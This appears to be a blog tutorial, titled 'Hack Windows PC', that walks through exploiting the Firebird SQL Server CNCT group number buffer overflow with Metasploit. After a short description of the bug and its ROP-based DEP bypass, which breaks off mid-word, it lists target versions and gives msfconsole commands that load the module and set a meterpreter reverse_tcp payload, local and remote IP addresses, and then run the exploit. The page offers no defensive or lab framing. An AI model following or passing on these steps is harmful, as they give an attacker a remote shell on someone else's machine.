Hack Windows PC using Firebird Relational Database CNCT Group Number Buffer Overflow

This module exploits vulnerability in Firebird SQL Server. A specially crafted packet can be sent which will overwrite a pointer allowing the attacker to control where data is read from. Shortly, following the controlled read, the pointer is called resulting in code execution. The vulnerability exists with a group number extracted from the CNCT information, which is sent by the client, and whose size is not properly checked. This module uses an existing call to memcpy, just prior to the vulnerable code, which allows a small amount of data to be written to the stack. A two-phase stack pivot allows executing the ROP chain which ultimately is used to execute Virtual Alloc and bypass DE

Exploit Targets

Windows FB 2.5.2.26539 (default)

Windows FB 2.5.1.26351

Windows FB 2.1.5.18496

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/misc/fb_cnct_group

msf exploit (fb_cnct_group)>set payload windows/meterpreter/reverse_tcp

msf exploit (fb_cnct_group)>set lhost 192.168.0.102 (IP of Local Host)

msf exploit (fb_cnct_group)>set rhost 192.168.0.111 (This must be an address on the Remote machine)

msf exploit (fb_cnct_group)>exploit

Leave a Reply

Your email address will not be published. Required fields are marked *